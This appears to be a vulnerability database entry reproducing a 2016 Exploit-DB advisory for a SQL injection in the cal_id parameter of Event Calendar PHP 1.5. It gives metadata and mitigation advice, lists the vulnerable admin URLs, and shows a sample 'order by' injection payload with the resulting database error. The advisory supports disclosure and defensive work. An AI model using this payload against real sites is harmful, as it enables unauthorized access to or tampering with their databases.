Event Calendar PHP 1.5 - SQL Injection

vendor:

Event Calendar PHP

by:

Ashiyane Digital Security Team

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Event Calendar PHP

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE: N/A

CPE: a:eventcalendarphp:event_calendar_php:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WebApp - PHP

2016

Event Calendar PHP 1.5 – SQL Injection

A SQL injection vulnerability exists in Event Calendar PHP 1.5. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'cal_id' parameter of the vulnerable URL. An attacker can exploit this vulnerability to access or modify the data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=====================================================
# Event Calendar PHP 1.5 - SQL Injection
=====================================================
# Vendor Homepage: http://eventcalendarphp.com/
# Date: 21 Oct 2016
# Version : 1.5
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:
Vulnerable Url:
http://localhost/eventcalendar/admin.php?act=options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_options&cal_id=[payload]
http://localhost/eventcalendar/admin.php?act=cal_language&cal_id=[payload]
Vulnerable parameter : cal_id
Mehod : GET

A simple inject :
Payload : '+order+by+20--+
http://localhost/eventcalendar/admin.php?act=options&cal_id=1'+order+by+20--+

In response can see result :
query error: SELECT * FROM pa_ecal_calendars WHERE cal_id='1' order by
20-- '. Error: Unknown column '20' in 'order clause'

Result of payload: Error: Unknown column '20' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================